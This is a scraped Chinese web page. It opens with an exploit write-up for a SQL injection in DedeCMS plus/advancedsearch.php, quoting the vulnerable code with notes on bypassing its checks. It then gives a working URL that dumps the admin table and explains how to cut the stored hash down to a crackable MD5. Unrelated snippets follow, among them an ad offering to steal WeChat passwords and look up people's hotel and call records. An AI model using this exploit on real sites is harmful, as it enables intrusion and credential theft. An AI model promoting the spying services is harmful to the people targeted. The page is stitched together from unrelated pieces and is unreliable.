漏洞描述:
健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求。
plus/advancedsearch.php
$sql 变量未初始化。导致鸡助漏洞
复制代码代码如下:
if($mid == 0) //必须绕过。
{
showmsg('参数不正确,高级自定义搜索必须指定模型id', 'javascript');
exit();
}
$query = "select maintable, mainfields, addontable, addonfields, template from dede_advancedsearch where mid='$mid'";
$searchinfo = $dsql->GetOne($query);
if(!is_array($searchinfo)) //囧啊,绕过有难度。
{
showmsg('自定义搜索模型不存在','-1'); exit();
}
$template = $searchinfo['template'] != '' ? $searchinfo['template'] : 'advancedsearch.htm';
if(empty($sql)) //人品问题,成功绕过!{
..............
}else{
$sql = urldecode($sql);
$query = $sql;
}
$sql = urlencode($sql);
$dlist = new DataListCP();
$dlist->pageSize = 20;
$dlist->SetParameter("sql", $sql);
$dlist->SetParameter("mid", $mid);
...............
$dlist->SetTemplate($templatefile);
$dlist->SetSource($query);
.............<*参考
*>
测试 *** :
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码, *** 是,前减3后减1,得到16位MD5
据美国科技媒体The Information报道,Facebook旗下的Instagram可能出现用户密码泄露事件,原因与帮助用户下载数据副本的工具有关。Facebook称,Instagram用户...
在网上能不能查看别人的微信记录呢?好方法给到你(最有效的方法) 专业盗取微信密码,开房查询,通话记录查询,查询微信聊天记录,非常靠谱!在过去十年的4G时代里,互联网快速的发展,现在我们的生活已经离不...
天文望远镜什么牌子的好(该如何去挑选呢)我想买天文望远镜,到底买怎样的好?这个问题实在不好回答,因为不同的爱好者水平、经济能力等因素各不相同,要给出同样的答案勉为其难。这里我整理了十个有关问题,希望能...
相信现在有很多的朋友们对于咨询一下房产证过户在哪里办理呢都想要了解吧,那么今天小编就来给大家针对咨询一下房产证过户在哪里办理呢进行一个介绍吧,希望小编介绍的内容能够为大家起到帮助哦 直接去当地房地产交...
新世代流行美声首席蔡程昱首张个人作品先导单曲《自己的明天》(TheLightBeyond)于2020年10...
ei期刊是啥(SCI、EI、IEEE是啥关联?)SCI(科学研究引用文献数据库索引 )、EI(工程项目数据库索引 )、ISTP(高新科技会议录数据库索引 ) 是世界著名的三大高新科技文献资料系统软件,...